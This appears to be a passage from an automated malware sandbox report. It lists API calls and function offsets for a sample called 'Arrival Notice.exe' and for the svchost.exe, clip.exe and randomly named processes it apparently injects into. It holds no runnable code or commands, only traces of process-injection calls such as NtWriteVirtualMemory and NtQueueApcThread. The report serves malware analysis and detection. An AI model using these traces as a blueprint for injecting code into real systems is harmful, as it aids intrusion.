            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872B60 NtClose,LdrInitializeThunk,1_2_03872B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03872DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03872C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038735C0 NtCreateMutant,LdrInitializeThunk,1_2_038735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03874340 NtSetContextThread,1_2_03874340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03874650 NtSuspendThread,1_2_03874650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872B80 NtQueryInformationFile,1_2_03872B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872BA0 NtEnumerateValueKey,1_2_03872BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872BE0 NtQueryValueKey,1_2_03872BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872BF0 NtAllocateVirtualMemory,1_2_03872BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872AB0 NtWaitForSingleObject,1_2_03872AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872AD0 NtReadFile,1_2_03872AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872AF0 NtWriteFile,1_2_03872AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872F90 NtProtectVirtualMemory,1_2_03872F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872FA0 NtQuerySection,1_2_03872FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872FB0 NtResumeThread,1_2_03872FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872FE0 NtCreateFile,1_2_03872FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872F30 NtCreateSection,1_2_03872F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872F60 NtCreateProcessEx,1_2_03872F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872E80 NtReadVirtualMemory,1_2_03872E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872EA0 NtAdjustPrivilegesToken,1_2_03872EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872EE0 NtQueueApcThread,1_2_03872EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872E30 NtWriteVirtualMemory,1_2_03872E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872DB0 NtEnumerateKey,1_2_03872DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872DD0 NtDelayExecution,1_2_03872DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872D00 NtSetInformationFile,1_2_03872D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872D10 NtMapViewOfSection,1_2_03872D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872D30 NtUnmapViewOfSection,1_2_03872D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872CA0 NtQueryInformationToken,1_2_03872CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872CC0 NtQueryVirtualMemory,1_2_03872CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872CF0 NtOpenProcess,1_2_03872CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872C00 NtQueryInformationProcess,1_2_03872C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872C60 NtCreateKey,1_2_03872C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03873090 NtSetValueKey,1_2_03873090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03873010 NtOpenDirectoryObject,1_2_03873010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038739B0 NtGetContextThread,1_2_038739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03873D10 NtOpenProcessToken,1_2_03873D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03873D70 NtOpenThread,1_2_03873D70
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F4650 NtSuspendThread,LdrInitializeThunk,3_2_050F4650
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F4340 NtSetContextThread,LdrInitializeThunk,3_2_050F4340
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2D10 NtMapViewOfSection,LdrInitializeThunk,3_2_050F2D10
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_050F2D30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2DD0 NtDelayExecution,LdrInitializeThunk,3_2_050F2DD0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_050F2DF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2C60 NtCreateKey,LdrInitializeThunk,3_2_050F2C60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_050F2C70
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_050F2CA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2F30 NtCreateSection,LdrInitializeThunk,3_2_050F2F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2FB0 NtResumeThread,LdrInitializeThunk,3_2_050F2FB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2FE0 NtCreateFile,LdrInitializeThunk,3_2_050F2FE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_050F2E80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2EE0 NtQueueApcThread,LdrInitializeThunk,3_2_050F2EE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2B60 NtClose,LdrInitializeThunk,3_2_050F2B60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_050F2BA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2BE0 NtQueryValueKey,LdrInitializeThunk,3_2_050F2BE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_050F2BF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2AD0 NtReadFile,LdrInitializeThunk,3_2_050F2AD0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2AF0 NtWriteFile,LdrInitializeThunk,3_2_050F2AF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F35C0 NtCreateMutant,LdrInitializeThunk,3_2_050F35C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F39B0 NtGetContextThread,LdrInitializeThunk,3_2_050F39B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2D00 NtSetInformationFile,3_2_050F2D00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2DB0 NtEnumerateKey,3_2_050F2DB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2C00 NtQueryInformationProcess,3_2_050F2C00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2CC0 NtQueryVirtualMemory,3_2_050F2CC0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2CF0 NtOpenProcess,3_2_050F2CF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2F60 NtCreateProcessEx,3_2_050F2F60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2F90 NtProtectVirtualMemory,3_2_050F2F90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2FA0 NtQuerySection,3_2_050F2FA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2E30 NtWriteVirtualMemory,3_2_050F2E30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2EA0 NtAdjustPrivilegesToken,3_2_050F2EA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2B80 NtQueryInformationFile,3_2_050F2B80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F2AB0 NtWaitForSingleObject,3_2_050F2AB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F3010 NtOpenDirectoryObject,3_2_050F3010
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F3090 NtSetValueKey,3_2_050F3090
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F3D10 NtOpenProcessToken,3_2_050F3D10
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050F3D70 NtOpenThread,3_2_050F3D70
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_02F97B40 NtCreateFile,3_2_02F97B40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_02F97E30 NtClose,3_2_02F97E30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_02F97F90 NtAllocateVirtualMemory,3_2_02F97F90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_02F97CA0 NtReadFile,3_2_02F97CA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_02F97D90 NtDeleteFile,3_2_02F97D90
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0041D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_0041D5EB
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00411201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00411201
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0041E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0041E8F6
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003BBF400_2_003BBF40
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_004220460_2_00422046
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003B80600_2_003B8060
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_004182980_2_00418298
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003EE4FF0_2_003EE4FF
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003E676B0_2_003E676B
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_004448730_2_00444873
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003DCAA00_2_003DCAA0
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003BCAF00_2_003BCAF0
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003CCC390_2_003CCC39
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003E6DD90_2_003E6DD9
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003CB1190_2_003CB119
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003B91C00_2_003B91C0
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003D13940_2_003D1394
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003D17060_2_003D1706
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003D781B0_2_003D781B
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003B79200_2_003B7920
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003C997D0_2_003C997D
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003D19B00_2_003D19B0
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003D7A4A0_2_003D7A4A
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003D1C770_2_003D1C77
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003D7CA70_2_003D7CA7
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0043BE440_2_0043BE44
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003E9EEE0_2_003E9EEE
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_003D1F320_2_003D1F32
            Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_035236100_2_03523610
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011C01_2_004011C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004021A51_2_004021A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004021B01_2_004021B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FACB1_2_0040FACB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FAD31_2_0040FAD3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004023201_2_00402320
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004023BC1_2_004023BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042D4431_2_0042D443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004164331_2_00416433
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FCF31_2_0040FCF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DD731_2_0040DD73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402F501_2_00402F50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F01_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039003E61_2_039003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FA3521_2_038FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C02C01_2_038C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E02741_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F41A21_2_038F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039001AA1_2_039001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F81CC1_2_038F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038301001_2_03830100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA1181_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C81581_2_038C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D20001_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383C7C01_2_0383C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038647501_2_03864750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038407701_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385C6E01_2_0385C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039005911_2_03900591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038405351_2_03840535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EE4F61_2_038EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E44201_2_038E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F24461_2_038F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F6BD71_2_038F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FAB401_2_038FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA801_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038429A01_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390A9A61_2_0390A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038569621_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038268B81_2_038268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E8F01_2_0386E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384A8401_2_0384A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038428401_2_03842840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BEFA01_2_038BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832FC81_2_03832FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03882F281_2_03882F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03860F301_2_03860F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E2F301_2_038E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B4F401_2_038B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03852E901_2_03852E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FCE931_2_038FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FEEDB1_2_038FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FEE261_2_038FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840E591_2_03840E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03858DBF1_2_03858DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383ADE01_2_0383ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384AD001_2_0384AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DCD1F1_2_038DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0CB51_2_038E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830CF21_2_03830CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840C001_2_03840C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0388739A1_2_0388739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F132D1_2_038F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382D34C1_2_0382D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038452A01_2_038452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385B2C01_2_0385B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E12ED1_2_038E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385D2F01_2_0385D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384B1B01_2_0384B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387516C1_2_0387516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382F1721_2_0382F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390B16B1_2_0390B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EF0CC1_2_038EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038470C01_2_038470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F70E91_2_038F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FF0E01_2_038FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FF7B01_2_038FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F16CC1_2_038F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038856301_2_03885630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DD5B01_2_038DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039095C31_2_039095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F75711_2_038F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FF43F1_2_038FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038314601_2_03831460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385FB801_2_0385FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B5BF01_2_038B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0387DBF91_2_0387DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFB761_2_038FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DDAAC1_2_038DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03885AA01_2_03885AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E1AA31_2_038E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EDAC61_2_038EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFA491_2_038FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F7A461_2_038F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B3A6C1_2_038B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D59101_2_038D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038499501_2_03849950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385B9501_2_0385B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038438E01_2_038438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AD8001_2_038AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03841F921_2_03841F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFFB11_2_038FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03803FD21_2_03803FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03803FD51_2_03803FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFF091_2_038FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03849EB01_2_03849EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385FDC01_2_0385FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03843D401_2_03843D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F1D5A1_2_038F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F7D731_2_038F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FFCF21_2_038FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B9C321_2_038B9C32
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeCode function: 2_2_04A8FCC92_2_04A8FCC9
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeCode function: 2_2_04A8FCCD2_2_04A8FCCD
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeCode function: 2_2_04AA6CDD2_2_04AA6CDD
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeCode function: 2_2_04A8958D2_2_04A8958D
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeCode function: 2_2_04A8760D2_2_04A8760D
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeCode function: 2_2_04A8936D2_2_04A8936D
            Source: C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exeCode function: 2_2_04A893652_2_04A89365
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050C05353_2_050C0535
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_051805913_2_05180591
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_051644203_2_05164420
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_051724463_2_05172446
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0516E4F63_2_0516E4F6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050E47503_2_050E4750
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050C07703_2_050C0770
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050BC7C03_2_050BC7C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050DC6E03_2_050DC6E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050B01003_2_050B0100
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0515A1183_2_0515A118
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_051481583_2_05148158
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_051801AA3_2_051801AA
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_051741A23_2_051741A2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_051781CC3_2_051781CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_051520003_2_05152000
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0517A3523_2_0517A352
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050CE3F03_2_050CE3F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_051803E63_2_051803E6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_051602743_2_05160274
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_051402C03_2_051402C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0515CD1F3_2_0515CD1F
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050CAD003_2_050CAD00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050D8DBF3_2_050D8DBF
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050BADE03_2_050BADE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050C0C003_2_050C0C00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05160CB53_2_05160CB5
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050B0CF23_2_050B0CF2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05162F303_2_05162F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05102F283_2_05102F28
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050E0F303_2_050E0F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05134F403_2_05134F40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0513EFA03_2_0513EFA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050B2FC83_2_050B2FC8
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0517EE263_2_0517EE26
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050C0E593_2_050C0E59
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0517CE933_2_0517CE93
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050D2E903_2_050D2E90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0517EEDB3_2_0517EEDB
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050D69623_2_050D6962
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050C29A03_2_050C29A0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0518A9A63_2_0518A9A6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050CA8403_2_050CA840
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050C28403_2_050C2840
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050A68B83_2_050A68B8
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050EE8F03_2_050EE8F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0517AB403_2_0517AB40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05176BD73_2_05176BD7
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050BEA803_2_050BEA80
